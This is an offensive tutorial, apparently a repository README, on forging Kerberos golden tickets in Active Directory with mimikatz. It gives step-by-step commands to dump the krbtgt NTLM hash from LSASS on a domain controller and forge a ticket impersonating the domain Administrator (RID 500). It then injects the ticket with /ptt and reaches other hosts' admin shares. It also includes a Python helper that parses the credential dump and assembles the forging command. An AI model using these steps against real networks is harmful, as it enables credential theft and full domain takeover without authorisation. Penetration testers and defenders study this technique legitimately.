Golden-Ticket-Attack

Active Directory Post Exploitation



A golden ticket is a forged Kerberos ticket-granting ticket (TGT). Every TGT issued in a domain is encrypted and signed with the key of the krbtgt account, so an attacker who obtains the krbtgt account's NTLM hash (which requires domain admin or equivalent access to a domain controller) can forge a TGT for any user, including one carrying domain admin group membership, without ever asking the KDC. A silver ticket is the same idea applied to a single service: instead of the krbtgt hash you take the NTLM hash of the service account (or computer account) that runs the service and forge a service ticket for it. For either attack you also need the domain SID, the security identifier that is the common prefix of every account SID in the domain; the per-account RID (for example 500 for the built-in Administrator) is appended to it. These values are fed to the kerberos::golden module of mimikatz, which builds the ticket and can inject it into the current logon session.

Golden Ticket Attacks w/ mimikatz

Using mimikatz.exe, dump the krbtgt NTLM hash and the domain SID. lsadump::lsa /inject reads the secret by injecting into LSASS, so it must be run from an elevated prompt on a domain controller; privilege::debug first grants the SeDebugPrivilege it needs.

.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt


Now generate the golden ticket from the krbtgt hash and the domain SID. The template below leaves the values blank; fill them in from the dump: /user is the account name to impersonate (any name, it does not have to exist), /domain is the fully qualified DNS domain name, /sid is the domain SID from the Domain line (with no RID appended), /krbtgt is the NTLM hash, and /id is the RID of the account to impersonate.

kerberos::golden /user: /domain: /sid: /krbtgt: /id:

NOTE: /id is set to 500 for a golden ticket attack. 500 is the RID of the built-in domain Administrator account, so the forged ticket carries that account's SID regardless of the name given in /user (mimikatz also adds the domain admin group RIDs 512, 513, 518, 519 and 520 by default). Add /ptt to inject the ticket into the current logon session; without it mimikatz writes the ticket to ticket.kirbi on disk, which you then load with kerberos::ptt ticket.kirbi.
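To make the dump and generate steps above concrete, here is an added Python example (not code from the original page): it parses console output shaped like that of lsadump::lsa /inject /name:krbtgt, checks that the dumped account really is krbtgt, and assembles the kerberos::golden line from the results, refusing an account SID where a domain SID is required. The sample dump, the domain SID, the hash and the DNS name lab.local are all constructed for this example.

```python
import re

# Constructed sample shaped like the console output of
# `lsadump::lsa /inject /name:krbtgt`; the domain SID and hash are made up.
SAMPLE_LSADUMP_OUTPUT = """\
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : LAB / S-1-5-21-1111111111-2222222222-3333333333

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 3f1e4a5b6c7d8e9f0a1b2c3d4e5f6a7b
    LM   :
"""

# Domain SID of an AD domain: S-1-5-21 followed by exactly three sub-authorities.
# Account SIDs are this prefix plus a fourth number, the RID.
DOMAIN_SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}$")

_DOMAIN_LINE = re.compile(
    r"^Domain\s*:\s*(?P<netbios>\S+)\s*/\s*(?P<sid>S-1-5-21(?:-\d+){3})\s*$", re.M
)
_USER_LINE = re.compile(r"^User\s*:\s*(?P<user>\S+)\s*$", re.M)
_NTLM_LINE = re.compile(r"^\s*NTLM\s*:\s*(?P<ntlm>[0-9a-fA-F]{32})\s*$", re.M)


def parse_krbtgt_dump(text):
    """Extract (netbios_domain, domain_sid, krbtgt_ntlm) from lsadump::lsa output.

    Raises ValueError if the dump is for another account or is incomplete: the
    hash of any account other than krbtgt only lets you forge service tickets
    (a silver ticket), not TGTs.
    """
    user = _USER_LINE.search(text)
    if not user or user.group("user").lower() != "krbtgt":
        raise ValueError("dump is not for the krbtgt account")
    dom = _DOMAIN_LINE.search(text)
    if not dom:
        raise ValueError("no 'Domain : NAME / S-1-5-21-...' line found")
    ntlm = _NTLM_LINE.search(text)
    if not ntlm:
        raise ValueError("no 32-hex-digit NTLM hash found")
    return dom.group("netbios"), dom.group("sid"), ntlm.group("ntlm").lower()


def forged_account_sid(domain_sid, rid):
    """SID the forged ticket will carry: the domain SID plus the RID given in /id."""
    if not DOMAIN_SID_RE.match(domain_sid):
        raise ValueError("expected a domain SID, not an account SID: " + domain_sid)
    return f"{domain_sid}-{int(rid)}"


def build_golden_command(dns_domain, domain_sid, krbtgt_ntlm,
                         user="Administrator", rid=500, ptt=True):
    """Assemble the kerberos::golden line for the values dumped above.

    /domain must be the DNS name (assumed lab.local here), not the NetBIOS
    name from the dump; /sid must be the domain SID with no RID appended;
    /id:500 selects the built-in Administrator RID whatever name /user
    carries; /ptt injects the ticket into the current logon session instead
    of writing ticket.kirbi.
    """
    forged_account_sid(domain_sid, rid)  # validates the SID shape
    if not re.fullmatch(r"[0-9a-f]{32}", krbtgt_ntlm.lower()):
        raise ValueError("krbtgt NTLM hash must be 32 hex digits")
    parts = [
        "kerberos::golden",
        f"/user:{user}",
        f"/domain:{dns_domain}",
        f"/sid:{domain_sid}",
        f"/krbtgt:{krbtgt_ntlm.lower()}",
        f"/id:{int(rid)}",
    ]
    if ptt:
        parts.append("/ptt")
    return " ".join(parts)


if __name__ == "__main__":
    netbios, sid, ntlm = parse_krbtgt_dump(SAMPLE_LSADUMP_OUTPUT)
    # lab.local is an assumed DNS name for the NetBIOS domain LAB.
    print(build_golden_command("lab.local", sid, ntlm))
    print("ticket will carry SID", forged_account_sid(sid, 500))
```

The SID check is the part worth keeping even if you type the command by hand: pasting an account SID (one with a trailing RID) into /sid produces a ticket the domain controllers reject, and mimikatz will not warn you.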


Use the golden ticket to access other machines.

misc::cmd starts a new cmd.exe in the logon session the ticket was injected into, so every Kerberos-authenticated connection made from that prompt (SMB, WinRM and so on) presents the forged TGT and is treated as the impersonated account on any machine in the domain.

misc::cmd


Access other machines. From the new prompt, listing the administrative share of another host confirms that the ticket is accepted; klist in the same prompt shows the injected TGT in the ticket cache.

dir \\DESKTOP-1\c$
